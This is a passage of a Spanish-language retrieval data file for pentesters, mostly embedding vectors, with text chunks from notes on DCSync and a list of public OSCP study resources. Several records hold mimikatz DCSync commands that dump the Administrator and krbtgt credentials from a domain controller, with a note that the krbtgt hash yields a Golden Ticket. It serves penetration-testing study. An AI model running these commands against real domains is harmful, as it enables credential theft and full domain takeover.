"v": [-0.03556, 0.07219, -0.08332, -0.24604, 0.06404, -0.14937, -0.13318, -0.06381, 0.00737, -0.05273, -0.03372, -0.16712, -0.13841, -0.15507, 0.06342, 0.0138, 0.12074, -0.16889, -0.00943, 0.02002, 0.01522, -0.00196, -0.1362, -0.0206, -0.13215, 0.0185, 0.04566, -0.01527, -0.19208, 0.02671, 0.04085, -0.03545, 0.02207, -0.04399, -0.02195, -0.01376, -0.08251, 0.09416, 0.0644, 0.03753, -0.02107, 0.0598, -0.10752, 0.14473, 0.07684, 0.01958, 0.07648, -0.05498, 0.06704, 0.08491, -0.07035, -0.16498, -0.04882, -0.11781, 0.01508, -0.10866, 0.10171, -0.11102, -0.03641, -0.10483, -0.12221, 0.016, -0.08384, -0.02212, -0.01498, -0.07589, 0.07457, -0.05685, -0.05052, 0.11064, -0.06014, 0.01984, 0.10303, 0.08193, -0.00505, 0.01021, 0.03059, -0.06834, -0.02295, 0.08091, 0.18004, 0.0283, -0.03468, -0.04669, -0.07376, -0.14382, 0.06617, -0.02019, 0.03483, -0.11193, 0.11395, 0.05787, -0.0461, 0.1038, 0.00587, 0.00693, 0.0282, -0.02871, 0.09411, 0.0308, 0.06753, -0.09676, -0.02022, 0.11726, -0.01669, 0.06038, -0.06775, -0.02867, -0.13178, 0.00826, 0.00531, 0.01557, 0.02191, -0.03423, -0.00146, 0.0701, -0.01003, -0.10607, -0.03457, 0.03304, -0.07323, 0.02732, -0.00539, -0.00601, -0.02321, -0.02416, -0.03184, 0.04885, -0.0293, -0.02495, 0.03971, -0.00889, -0.08673, 0.00011, -0.01361, -0.02872, 0.07338, -0.06819, -0.00836, -0.10048, 0.04463, 0.0121, 0.02907, -0.0037, 0.02784, -0.00996, 0.12057, 0.04569, -0.03435, 0.00196, 0.04313, -0.02999, -0.01266, -0.00727, -0.01633, -0.0017, -0.02056, 0.04661, -0.04992, 0.04536, -0.01918, -0.06456, -0.00196, 0.005, -0.02099, -0.04708, -0.04048, 0.03557, 0.06035, 0.09087, 0.00453, 0.04251, 0.014, -0.12157, -0.01114, -0.03578, -0.01556, -0.02908, -0.01173, -0.0412, -0.06749, 0.01775, -0.01423, 0.01825, -0.02051, 0.00467, -0.01257, -0.01827, -0.05141, -0.00509, -0.03279, 0.02464, -0.00481, -0.05364, 0.02383, -0.02315, -0.05049, -0.06215, 0.0204, -0.05244, -0.08155, -0.0195, -0.00333, -0.03547, 0.08605, 0.03245, -0.02, 0.04279, 0.0422, 0.04322, -0.00766, 0.01441, 0.04009, -0.02659, -0.02667, -0.0567, 0.02388, 0.02218, -0.00365, 0.02558, -0.01519, -0.00225, 0.02505, 0.00154, -0.00023, 0.01801, -0.00682, 0.01206, 0.03885, 0.02419, 0.0204, 0.02655, 0.00759, -0.00865, 0.023, -0.03886, 0.02893, -0.0232, -0.04628, -0.04022, -0.02701, 0.05898, -0.0099, -0.04653, -0.08434, -0.03761, 0.0198, -0.00684, 0.01038, -0.07899, 0.00135, -0.004, 0.02749, -0.01468, -0.01839, 0.01314]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# o desde mimikatz en una mΓ‘quina del dominio:\nlsadump::dcsync /user:Administrator\nlsadump::dcsync /user:krbtgt # ← el premio gordo\n```", "indexar": "con quΓ© puedo robar credenciales del controlador de dominio mediante dcsync?", "v": [0.08997, -0.11627, -0.02994, -0.00912, -0.00503, 0.0107, 0.18943, 0.1541, -0.10153, -0.03942, 0.00068, -0.13889, -0.02796, -0.30189, -0.02835, 0.0023, 0.06228, 0.02488, -0.07328, 0.01775, -0.02338, -0.20454, 0.01576, -0.04682, 0.14802, -0.02359, -0.06163, -0.05293, -0.04347, 0.0864, 0.04204, -0.04291, 0.03501, 0.0451, -0.07116, -0.05474, -0.10995, 0.05068, 0.03052, 0.17729, 0.05233, -0.01775, -0.15978, -0.04121, 0.04348, -0.06556, -0.01425, -0.11406, 0.01669, -0.05465, -0.0652, -0.09466, -0.13914, -0.03663, -0.00952, 0.02588, 0.00646, 0.03791, 0.12315, -0.14969, -0.04648, -0.06318, -0.0, 0.05873, -0.11114, -0.06424, 0.01619, -0.02239, -0.03961, 0.02701, -0.05206, -0.01157, 0.01092, 0.05737, 0.05242, -0.07514, -0.02321, 0.0519, 0.14265, -0.05631, 0.01304, -0.01426, -0.07114, 0.00215, 0.01116, -0.06902, -0.03701, -0.12629, -0.04893, 0.00631, 0.05574, 0.02907, -0.06524, -0.04205, -0.07094, -0.04239, 0.01726, 0.03319, -0.07519, -0.01969, 0.10087, 0.06521, -0.12579, 0.15406, 0.02242, 0.11336, 0.05781, -0.03081, 0.00185, -0.04748, -0.03352, 0.02179, -0.07954, -0.00912, -0.05146, 0.06149, -0.06308, -0.0493, 0.02111, -0.09339, -0.0213, -0.08377, 0.08975, -0.04626, 0.06322, 0.0447, 0.02591, 0.08876, -0.04306, -0.10124, -0.00673, -0.04355, 0.04825, -0.07194, 0.03202, 0.0509, -0.03626, -0.10063, -0.0784, 0.0409, -0.06345, 0.02182, -0.00421, 0.02671, 0.06791, -0.06012, -0.00551, -0.05547, -0.01831, -0.06252, -0.02325, 0.05715, -0.06144, 0.03203, 0.03808, 0.06119, 0.00117, -0.04257, -0.02978, 0.05291, -0.06345, 0.04849, -0.05761, 0.01954, -0.04627, -0.05755, 0.02354, -0.04374, -0.01654, 0.04344, 0.00837, 0.03544, 0.03565, -0.03528, -0.01574, -0.05015, 0.0315, -0.06485, -0.01644, -0.06562, -0.01213, 0.09622, 0.01843, 0.06297, -0.03541, 0.04497, 0.00131, 0.04192, -0.0185, 0.02937, 0.05147, -0.01007, -0.04162, -0.0046, 0.05523, -0.03281, 0.01541, 0.03594, -0.03253, 0.03938, -0.00959, 0.02814, -0.00278, 0.00146, 0.06474, 0.01632, 0.03837, 0.04302, 0.02808, -0.01891, 0.05914, -0.03322, 0.04662, -0.03859, -0.02949, 0.02876, -0.04676, 0.02604, -0.05701, -0.07912, 0.04238, 0.02423, 0.03043, 0.03449, -0.00294, -0.006, -0.05401, 0.01425, 0.02446, 0.04812, -0.02563, 0.01647, -0.05395, -0.06897, 0.03023, 0.01078, 0.04647, -0.03275, 0.0558, -0.01824, -0.0627, 0.05525, -0.02826, -0.0822, -0.07176, -0.03711, -0.06218, 0.00864, -0.01398, 0.0042, 0.04397, 0.05506, -0.01942, -0.0491, -0.05387, -0.04494]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# o desde mimikatz en una mΓ‘quina del dominio:\nlsadump::dcsync /user:Administrator\nlsadump::dcsync /user:krbtgt # ← el premio gordo\n```", "indexar": "que programa permite acceder al usuario krbtgt sin permisos administrativos?", "v": [0.15577, -0.01753, -0.00449, -0.2102, 0.17335, -0.12936, 0.0692, 0.00474, -0.23155, -0.09229, -0.01193, -0.03193, 0.04526, -0.01385, 0.07709, -0.07708, -0.00426, 0.00998, -5e-05, 0.13801, 0.14568, -0.01324, 0.05209, 0.11446, -0.10341, -0.0381, 0.05295, -0.05576, -0.06121, -0.03136, 0.04083, 0.02652, 0.02017, -0.04995, 0.05825, -0.03184, -0.02748, 0.07817, -0.04351, 0.06534, 0.13391, -0.07529, -0.07657, 0.09837, 0.01243, -0.07155, -0.0692, -0.0162, -0.02772, -0.03251, -0.06262, -0.04948, -0.15153, -0.11301, 0.02021, 0.00544, 0.11072, -0.18947, -0.03278, 0.00492, -0.01771, 0.03398, -0.00065, 0.04664, -0.01132, 0.01794, 0.1379, 0.0178, -0.0424, 0.0843, -0.05412, 0.03016, -0.04612, -0.05167, 0.02705, 0.02982, -0.13098, 0.00512, 0.07388, 0.00866, -0.01737, -0.04011, -0.05764, -0.01989, -0.10813, -0.18055, 0.06544, -0.03619, -0.03779, -0.00953, 0.10775, 0.0944, 0.07225, 0.07823, 0.03875, -0.07625, 0.01299, 0.04249, -0.0358, 0.10874, -0.00246, 0.04335, -0.09439, 0.11762, -0.09491, 0.06882, 0.07385, -0.05414, -0.00699, 0.03794, 0.02572, 0.00701, -0.11432, -0.05771, 0.01809, 0.10545, -0.05764, -0.1427, -0.04322, -0.1205, -0.05425, -0.00497, 0.02526, 0.01133, 0.10291, -0.06743, -0.01003, 0.08732, -0.03682, 0.0314, -0.00495, -0.00363, 0.06587, 0.08371, -0.07244, -0.04457, -0.07428, 0.02381, -0.06433, -0.03261, -0.05481, 0.0683, 0.0176, -0.02532, 0.00893, -0.04526, -0.03679, -0.07803, 0.01884, -0.00206, -0.01933, 0.01209, -0.03619, 0.07, -0.01557, -0.01852, -0.04595, -0.04216, -0.08386, 0.05596, 0.04917, 0.01422, -0.01644, 0.03388, 0.03947, -0.04136, -0.01436, 0.00229, 0.0853, 0.07518, -0.03724, 0.04259, 0.02903, -0.02008, 0.05102, -0.02327, -0.01458, -0.08123, 0.0172, -0.00929, -0.14927, 0.0099, 0.00332, -0.04484, -0.02695, -0.07119, -0.03621, 0.02557, 0.05961, 0.02566, 0.00834, 0.06156, -0.02184, -0.04186, 0.00875, -0.00857, -0.00962, 0.00899, 0.01943, -0.0533, -0.01173, 0.01926, 0.00455, -0.06553, 0.02548, 0.0026, 0.02452, 0.08817, -0.00147, 0.02249, 0.00024, -0.05926, 0.05342, -0.01832, -0.02918, -0.019, 0.00096, 0.00319, 0.03962, -0.00929, 0.01111, -0.01631, 0.04794, 0.03074, 0.07994, -0.06359, 0.09922, -0.00633, 0.007, 0.03011, -0.0314, -0.01424, -0.01871, -0.00592, 0.07339, -0.00716, -0.04781, -0.00518, -0.01582, -0.07738, -0.01018, 0.06713, 0.02415, -0.01959, -0.01629, -0.03132, -0.04845, 0.01052, -0.01904, -0.05824, 0.00892, 0.02085, 0.02234, -0.05316, 0.04995, -0.00207]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa\nEl hash de **krbtgt** β†’ Golden Ticket = control total y persistente del dominio.\n\nRelacionado: Mimikatz Β· Impacket Β· Active Directory Β· OSCP MOC", "indexar": "ΒΏQuΓ© herramienta puedo usar para generar un Golden Ticket?", "v": [-0.19608, 0.02198, -0.03331, -0.1005, -0.03282, 0.00236, -0.12534, -0.0284, 0.02101, -0.115, -0.1475, 0.01703, -0.1043, 0.07255, -0.00846, 0.04006, 0.05153, -0.13833, 0.01673, 0.03014, -0.00143, 0.06245, -0.01595, -0.21814, -0.02181, -0.04259, 0.15529, -0.06506, -0.11905, 0.05702, 0.05889, -0.08518, -0.03246, -0.1572, -0.14634, -0.12868, 0.01737, 0.11078, 0.05209, -0.00548, 0.01599, 0.04137, -0.01839, 0.04099, 0.10453, -0.00384, 0.02092, 0.05536, -0.14198, 0.06771, -0.02026, -0.0951, -0.09258, -0.0156, 0.04144, -0.10618, 0.10293, -0.15561, -0.05483, -0.03504, -0.09244, -0.08617, -0.07157, 0.02489, -0.14245, 0.02469, -0.00614, -0.00659, -0.05602, 0.05546, -0.06905, 0.04848, 0.06328, 0.08985, 0.07575, 0.01318, 0.0436, -0.01659, 0.02701, 0.06143, 0.05694, 0.03135, 0.01379, 0.01697, 0.00178, -0.08213, 0.13396, -0.07015, -0.03553, -0.06029, -0.0996, 0.0036, 0.05844, -0.00781, -0.00038, -0.09218, -0.05745, -0.06678, -0.07852, 0.03554, 0.12725, -0.09858, -0.00939, 0.0654, -0.03513, 0.00736, -0.0098, -0.05449, -0.10417, -0.03101, -0.04492, 0.02427, -0.11988, 0.01248, -0.02046, 0.10233, 0.05054, -0.05079, 0.04281, -0.06422, 0.10795, 0.04769, -0.07327, -0.06796, 0.04535, 0.03126, -0.0113, 0.06206, -0.0306, -0.04585, -0.04596, -0.00089, -0.03908, -0.03121, -0.01838, -0.01205, 0.0236, -0.13635, 0.04891, 0.03085, 0.02183, -0.01953, -0.04685, -0.09195, 0.01051, -0.06426, -0.02689, -0.03461, -0.04922, -0.02515, 0.04918, -0.11856, -0.04493, 0.07347, -0.06817, 0.02329, 0.00123, -0.01188, -0.11866, 0.00142, -0.07216, -0.02374, 0.00632, 0.01532, 0.02346, -0.00509, 0.00494, 0.03019, -0.01343, 0.06089, 0.09037, 0.02884, 0.07352, -0.01468, -0.00334, -0.10083, -0.08662, -0.02006, 0.0071, -0.08546, 0.07193, -0.00801, -0.05512, 0.01817, 0.00993, 0.00798, 0.06817, -0.03094, 0.01936, 0.07787, -0.04526, 0.03333, 0.08528, -0.04159, 0.02622, -0.05986, 0.02212, -0.0635, 0.02466, -0.04879, -0.01929, -0.00319, -0.04354, -0.00657, 0.11898, 0.02914, -0.05485, -0.01168, -0.00597, 0.06376, 0.0092, -0.01401, 0.10383, -0.03158, -0.01255, -0.01057, -0.0214, 0.02165, -0.04121, -0.03024, 0.07399, 0.03563, 0.03714, -0.00422, 0.02717, 0.03025, 0.01583, -0.00338, 0.0225, 0.03383, 0.06753, 0.00644, -0.02341, 0.02456, 0.0378, -0.0355, 0.0538, -0.03363, -0.06244, 0.02806, 0.00137, 0.07321, 0.01276, 0.05358, -0.0149, 0.00419, -0.00352, 0.03233, -0.0149, -0.05934, -0.00723, -0.00821, 0.04207, -0.05877, 0.00529, 0.01327]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa\nEl hash de **krbtgt** β†’ Golden Ticket = control total y persistente del dominio.\n\nRelacionado: Mimikatz Β· Impacket Β· Active Directory Β· OSCP MOC", "indexar": "Con quΓ© programa puedo obtener control total y persistente de un dominio AD?", "v": [-0.0482, 0.15335, -0.06303, -0.07913, 0.06281, 0.06569, 0.12641, -0.06128, -0.26837, 0.07107, 0.01165, -0.06584, -0.11736, -0.17443, 0.02899, -0.02127, 0.14434, -0.09941, -0.00684, 0.05662, 0.0944, -0.17672, 0.04939, -0.08384, 0.11669, 0.00611, 0.0531, -0.06376, 0.02523, -0.01391, -0.00676, -0.02824, 0.10488, 0.01794, -0.05686, -0.0249, 0.00698, 0.18282, 0.09427, 0.1107, -0.01979, -0.07196, -0.02435, 0.0192, 0.02119, 0.03576, -0.02037, 0.02589, -0.0396, -0.08367, -0.03165, 0.02893, -0.06059, -0.01704, 0.08146, -0.056, -0.02578, -0.06296, -0.01057, -0.04661, -0.02088, -0.08473, 0.03281, 0.06001, -0.0365, -0.09739, 0.05881, -0.03282, -0.04369, 0.08094, 0.03318, -0.06033, 0.03167, 0.0149, 0.05104, -0.07718, -0.02591, -0.01351, 0.08472, -0.1288, -0.03671, -0.0247, 0.00531, 0.02211, -0.03206, -0.1285, -0.09931, -0.20189, -0.02007, 0.00033, 0.07527, -0.01073, -0.00951, 0.05523, -0.04355, -0.05311, 0.06322, 0.03905, -0.05951, -0.01987, 0.05853, 0.06834, -0.12107, 0.16768, 0.088, 0.12045, 0.08233, -0.04786, 0.01758, 0.06885, -0.05913, -0.05112, -0.09456, -0.02049, -0.0354, 0.07493, -0.03664, 0.03455, 0.07344, -0.09454, -0.0708, 0.0765, 0.01386, 0.06283, 0.08209, 0.01529, -0.02187, 0.0567, -0.1079, -0.09203, 0.0713, 0.00174, 0.03586, -0.07125, 0.04771, -0.00943, 0.00019, 0.08622, 0.00331, -0.01708, -0.03669, 0.04357, -0.0465, 0.0111, 0.02481, -0.12011, -0.01136, -0.07702, 0.0246, -0.00141, -0.06801, 0.00797, 0.0222, 0.04407, -0.05772, 0.05154, -0.02156, 0.01201, -0.01416, 0.02675, -0.02741, 0.00743, -0.06315, 0.02019, 0.04557, -0.03384, 0.02509, 0.03889, 0.01081, 0.10639, -0.07727, 0.0442, 0.02485, -0.07582, -0.02124, -0.06204, 0.01202, -0.10848, 0.01092, -0.08323, -0.0797, 0.02056, 0.06451, 0.07085, 0.01693, 0.04208, -0.06298, 0.03738, -0.01905, -0.00104, 0.05953, 0.05313, -0.04747, 0.00964, 0.02571, -0.02525, 0.00537, 0.02014, -0.02336, -0.04886, -0.04373, -0.02446, 0.01093, 0.04328, 0.00417, 0.03146, -0.04446, -0.02992, 0.04336, 0.08512, 0.00262, 0.00536, -0.00328, -0.02563, -0.05198, 0.03598, -0.00513, 0.04058, 0.04092, -0.0414, 0.02707, 0.00703, -0.00431, 0.0146, 0.05553, -0.04166, 0.04831, 0.04842, 0.05986, 0.11578, -0.00767, -0.04232, 0.00674, -0.03458, 0.03944, 0.00277, 0.01976, -0.03645, 0.01532, 0.00837, -0.04926, 0.06011, 0.03049, -0.03605, -0.03686, -0.04654, -0.05203, 0.02126, -0.05292, 0.04058, -0.02461, 0.03561, -0.01963, -0.05533, -0.01409, 0.06951]} -{"tipo": "pregunta", "herramienta": "Recursos pΓΊblicos", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Recursos pΓΊblicos.md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "# Recursos pΓΊblicos\n\n> DΓ³nde estΓ‘ SÍ todo esto (cultura pΓΊblica, nada bajo NDA). Apoyo para MetodologΓ­a OSCP y el Reporte OSCP.\n\n| Recurso | Por quΓ© importa |\n|---|---|\n| **TJ Null's OSCP-like list** (Reddit) | MΓ‘quinas HTB/THM equivalentes a OSCP, actualizada |\n| **ippsec.rocks** | Buscador de writeups por tΓ©cnica (\"kerberoasting\" β†’ te lista las mΓ‘quinas) |\n| **0xdf.gitlab.io** | Writeups detalladΓ­simos y pedagΓ³gicos |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web (SQL injection, LFI a RCE, uploads) |\n| **HackTricks** (book.hacktricks.xyz) | La biblia: lo busques lo que busques, estΓ‘ |\n| **GTFOBins / LOLBAS** | Privesc Linux y LOLBins Windows β†’ GTFOBins y LOLBAS |\n| **/r/oscp** | Experiencias de examinados (sin spoilers) |\n| **Discords pΓΊblicos**: HTB, TryHackMe, NetSecFocus | Comunidades que SÍ puedes consultar |\n| **noraj/OSCP-Exam-Report-Template-Markdown** | Plantilla del Reporte OSCP |\n\n> Compilado de cultura pΓΊblica (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB). **No** es material bajo NDA de OffSec.\n\nRelacionado: un laboratorio Β· OSCP MOC", "indexar": "con que puedo buscar mΓ‘quinas similares a las de OSCP sin tener el examen", "v": [-0.06668, -0.00477, -0.10332, -0.15666, -0.08497, -0.14961, -0.05669, 0.10748, -0.11107, -0.06167, -0.09921, 0.02674, 0.00348, -0.04884, 0.10474, 0.08195, 0.07224, 0.00435, 0.03904, 0.0218, 0.01468, -0.08457, -0.05136, 0.07071, 0.10849, 0.17847, -0.06384, -0.09457, -0.1741, -0.07307, -0.01323, 0.12329, 0.09776, -0.05712, -0.04027, -0.02295, -0.05622, -0.03615, 0.03255, 0.07558, 0.01881, 0.07945, -0.1151, 0.06959, 0.1245, -0.05621, 0.05312, 0.13548, -0.07939, -0.11149, -0.09459, -0.09408, -0.04956, -0.04476, -0.05797, -0.10535, 0.11191, 0.07869, 0.19309, -0.11914, -0.00975, 0.04866, -0.05366, 0.0097, 0.03713, 0.0521, 0.01799, 0.05025, -0.09563, -0.00741, -0.07174, 0.02538, -0.06734, -0.05664, -0.00123, -0.0746, 0.00573, 0.01326, 0.17984, -0.01999, -0.01466, -0.05377, -0.03668, 0.03925, -0.06084, -0.07067, 0.02731, 0.03566, -0.01179, -0.04533, 0.03254, 0.09552, 0.05881, 0.0551, 0.07758, -0.0139, 0.05074, -0.01775, -0.01786, -0.0284, 0.03631, 0.01341, -0.01899, 0.07169, -0.18106, 0.01495, 0.10709, -0.01846, 0.05495, -0.04316, 0.03102, -0.00099, -0.06605, -0.04723, -0.09946, -0.06556, -0.04564, -0.02541, -0.01356, -0.00784, 0.0083, 0.01798, 0.04856, 0.01503, 0.06207, -0.00669, 0.12715, 0.07706, 0.0292, -0.02425, 0.05107, 0.04093, -0.12158, 0.00278, 0.00613, -0.06977, -0.04142, -0.09625, 0.01588, -0.05681, 0.03564, 0.0816, -0.02221, -0.11758, 0.02813, 0.00875, -0.004, -0.07884, -0.0347, -0.11608, -0.02737, -0.0455, 0.07993, 0.06074, -0.06771, 0.03467, 0.00179, 0.00318, 0.02731, 0.03242, -0.05152, 0.00383, -0.09459, 0.00646, 0.01944, 0.11423, -0.04244, -0.04702, -0.01643, -0.07079, -0.02425, -0.02041, -0.00748, -0.02202, 0.05858, 0.02348, 0.03097, -0.00174, 0.04425, -0.02032, -0.06359, 0.02561, -0.03672, -0.03744, 0.00204, 0.02034, 0.03459, -0.03504, 0.07084, -0.02345, 0.07332, -0.01634, -0.07193, -0.03316, 0.03685, -0.00293, 0.03978, 0.00993, 0.03253, -0.01991, -0.13327, -0.03715, -0.05755, -0.04999, 0.02317, 0.0262, -0.02064, 0.05419, -0.01093, 0.01122, -0.01396, 0.00571, 0.04128, -0.07196, -0.05328, -0.00932, 0.0154, 0.05727, -0.0427, 0.01227, 0.01215, -0.0309, 0.02658, 0.0696, -0.02636, -0.00443, 0.03113, 0.05197, 0.09583, -0.00367, 0.03746, 0.04085, 0.0659, -0.02242, 0.05839, 0.02826, 0.02999, -0.02723, -0.03928, -0.03615, 0.01878, -0.0073, -0.00559, -0.05866, -0.07567, 0.00437, -0.00909, -0.11264, 0.00259, -0.04334, 0.00182, -0.00239, 0.0264, -0.041, -0.00831, 0.06457]} -{"tipo": "pregunta", "herramienta": "Recursos pΓΊblicos", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Recursos pΓΊblicos.md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "# Recursos pΓΊblicos\n\n> DΓ³nde estΓ‘ SÍ todo esto (cultura pΓΊblica, nada bajo NDA). Apoyo para MetodologΓ­a OSCP y el Reporte OSCP.\n\n| Recurso | Por quΓ© importa |\n|---|---|\n| **TJ Null's OSCP-like list** (Reddit) | MΓ‘quinas HTB/THM equivalentes a OSCP, actualizada |\n| **ippsec.rocks** | Buscador de writeups por tΓ©cnica (\"kerberoasting\" β†’ te lista las mΓ‘quinas) |\n| **0xdf.gitlab.io** | Writeups detalladΓ­simos y pedagΓ³gicos |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web (SQL injection, LFI a RCE, uploads) |\n| **HackTricks** (book.hacktricks.xyz) | La biblia: lo busques lo que busques, estΓ‘ |\n| **GTFOBins / LOLBAS** | Privesc Linux y LOLBins Windows β†’ GTFOBins y LOLBAS |\n| **/r/oscp** | Experiencias de examinados (sin spoilers) |\n| **Discords pΓΊblicos**: HTB, TryHackMe, NetSecFocus | Comunidades que SÍ puedes consultar |\n| **noraj/OSCP-Exam-Report-Template-Markdown** | Plantilla del Reporte OSCP |\n\n> Compilado de cultura pΓΊblica (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB). **No** es material bajo NDA de OffSec.\n\nRelacionado: un laboratorio Β· OSCP MOC", "indexar": "hay algΓΊn sitio pΓΊblico con writeups detallados para aprender ciberseguridad?", "v": [0.13292, 0.14602, -0.07167, -0.02426, 0.11955, -0.27792, -0.00691, -0.12196, -0.11759, -0.06845, -0.01717, -0.09102, -0.02336, -0.01227, 0.0514, -0.0161, 0.10658, -0.00586, 0.05767, -0.01592, 0.07139, -0.03647, 0.00788, -0.0169, -0.05627, -0.1057, 0.02423, -0.07252, -0.09273, 0.07025, 0.03251, 0.13241, -0.03172, 0.03716, -0.06436, 0.0673, 0.05238, -0.02145, -0.13952, 0.01952, -0.04255, 0.01835, -0.10328, 0.05871, 0.06931, 0.02342, -0.01814, -0.06532, -0.03146, -0.07749, -0.01771, -0.01739, -0.07577, -0.12004, -0.05407, 0.00329, 0.12348, -0.07257, 0.08351, -0.0912, -0.0919, 0.13123, -0.08769, 0.03242, 0.04916, -0.01821, 0.02936, 0.07208, -0.13011, 0.07394, 0.03278, 0.01924, 0.00135, -0.0535, 0.0023, 0.00275, 0.0097, -0.003, 0.01824, 0.00636, -0.11, -0.00673, -0.05857, 0.02864, -0.09644, -0.04159, -0.00812, -0.02841, 0.03158, 0.00511, 0.11486, 0.10823, -0.07815, -0.0546, -0.05497, -0.07034, 0.02635, -0.01016, -0.10632, 0.0212, 0.01691, 0.00685, -0.00566, 0.00217, -0.04634, 0.14813, -0.02869, -0.08407, 0.03489, -0.04369, 0.03618, -0.00987, -0.08779, -0.05211, -0.09616, -0.08961, 0.0549, 0.01765, 0.06212, -0.01698, -0.09671, -0.01085, 0.02826, -0.08595, 0.05911, 0.08418, -0.03329, 0.09594, -0.03191, -0.07002, -0.03643, 0.01255, -0.0471, 0.06533, 0.02372, 0.07115, -0.01791, -0.03167, -0.14225, -0.0418, 0.00441, 0.03252, -0.03375, -0.03262, -0.05552, 0.00826, 0.046, -0.0855, -0.11453, 0.04769, -0.0262, 0.04742, -0.00866, 0.062, -0.02753, -0.07485, 0.00647, -0.09723, -0.03353, 0.06822, 0.00765, 0.07834, 0.03646, -0.08976, -0.00971, 0.05338, -0.11812, 0.04654, 0.04497, 0.01593, -0.04635, 0.0409, 0.06099, -0.10411, 0.04527, -0.06811, -0.07914, -0.08102, -0.00931, -0.06454, -0.01802, -0.03153, -0.08212, 0.01553, -0.00971, -0.01899, 0.08354, -0.03166, 0.0408, 0.04353, -0.0426, -0.04546, -0.03326, -0.02219, 0.02848, -0.03769, -0.04044, -0.03535, 0.02638, -0.04155, -0.04817, 0.03273, -0.00894, -0.00873, 0.00715, 0.04569, 0.02602, -0.06305, -0.01826, -0.01152, 0.10216, -0.06288, 0.05699, -0.04079, -0.0425, -0.02999, 0.01886, -0.00488, -0.06266, 0.06773, 0.00582, 0.07168, 0.03682, -0.01396, 0.07309, -0.01854, 0.04443, -0.00218, 0.05355, 0.08265, -0.02307, 0.02582, -0.02224, -0.04053, 0.05281, -0.00347, -0.02048, -0.03928, -0.10101, -0.05144, 0.02732, 0.10212, -0.02698, -0.10706, -0.02044, -0.08499, -0.08051, 0.00061, -0.04736, -0.06227, -0.03093, -0.03404, 0.02683, -0.04345, -0.01052, -0.04768]} -{"tipo": "pregunta", "herramienta": "Recursos pΓΊblicos", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Recursos pΓΊblicos.md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "# Recursos pΓΊblicos\n\n> DΓ³nde estΓ‘ SÍ todo esto (cultura pΓΊblica, nada bajo NDA). Apoyo para MetodologΓ­a OSCP y el Reporte OSCP.\n\n| Recurso | Por quΓ© importa |\n|---|---|\n| **TJ Null's OSCP-like list** (Reddit) | MΓ‘quinas HTB/THM equivalentes a OSCP, actualizada |\n| **ippsec.rocks** | Buscador de writeups por tΓ©cnica (\"kerberoasting\" β†’ te lista las mΓ‘quinas) |\n| **0xdf.gitlab.io** | Writeups detalladΓ­simos y pedagΓ³gicos |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web (SQL injection, LFI a RCE, uploads) |\n| **HackTricks** (book.hacktricks.xyz) | La biblia: lo busques lo que busques, estΓ‘ |\n| **GTFOBins / LOLBAS** | Privesc Linux y LOLBins Windows β†’ GTFOBins y LOLBAS |\n| **/r/oscp** | Experiencias de examinados (sin spoilers) |\n| **Discords pΓΊblicos**: HTB, TryHackMe, NetSecFocus | Comunidades que SÍ puedes consultar |\n| **noraj/OSCP-Exam-Report-Template-Markdown** | Plantilla del Reporte OSCP |\n\n> Compilado de cultura pΓΊblica (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB). **No** es material bajo NDA de OffSec.\n\nRelacionado: un laboratorio Β· OSCP MOC", "indexar": "dΓ³nde encuentro una lista completa de vulnerabilidades web o exploits para practicar?", "v": [0.0992, 0.09301, -0.21484, -0.19866, 0.01745, -0.0325, -0.0501, 0.04282, 0.02783, -0.10807, -0.01106, -0.11537, -0.11712, 0.09165, -0.00257, 0.00119, 0.062, -0.02195, 0.07883, -0.08315, -0.13869, 0.01969, -0.03899, 0.05351, -0.01423, -0.05066, -0.06583, -0.00285, 0.00409, -0.06795, -0.00538, 0.05536, -0.05615, 0.03503, 0.06795, 0.01012, 0.0469, -0.04525, 0.04925, -0.02487, -0.00972, 0.00753, -0.14351, 0.03758, 0.02747, -0.04451, -0.10155, -0.0311, -0.02929, -0.00767, -0.02885, 0.02798, -0.16136, -0.11831, 0.00416, -0.12429, 0.07171, -0.06884, -0.00743, -0.00948, -0.13694, -0.02196, 0.0387, 0.00041, 0.08247, -0.01123, 0.03778, 0.10479, -0.13677, 0.17624, 0.01215, 0.04461, -0.03186, -0.00149, -0.04357, -0.03903, 0.14256, 0.05463, -0.06993, 0.02338, 0.00147, -0.0348, -0.04793, 0.05128, -0.19456, -0.08591, 0.07276, -0.0099, 0.03984, -0.04592, 0.11143, 0.13709, -0.10887, -0.09175, -0.04363, -0.18654, 0.09996, 0.06021, -0.04905, -0.01798, -0.0504, 0.01345, -0.089, 0.0444, 0.0165, 0.00837, -0.07373, 0.08804, -0.13009, -0.08658, -0.02485, -0.03489, -0.03498, 0.00497, 0.00822, 0.02638, -0.0103, -0.02242, 0.06791, -0.07557, -0.09804, -0.03883, -0.09534, -0.03891, 0.02921, 0.08509, -0.01217, 0.07159, 0.04267, -0.01098, -0.0015, 0.00715, -0.02917, -0.0432, 0.03927, -0.00084, 0.10294, -0.04095, -0.07613, 0.00498, 0.06125, -0.01, -0.00785, -0.0178, -0.01935, 0.04802, 0.06886, -0.03527, -0.13414, 0.0202, -0.07726, 0.01272, -0.0485, 0.05076, -0.00604, -0.03328, 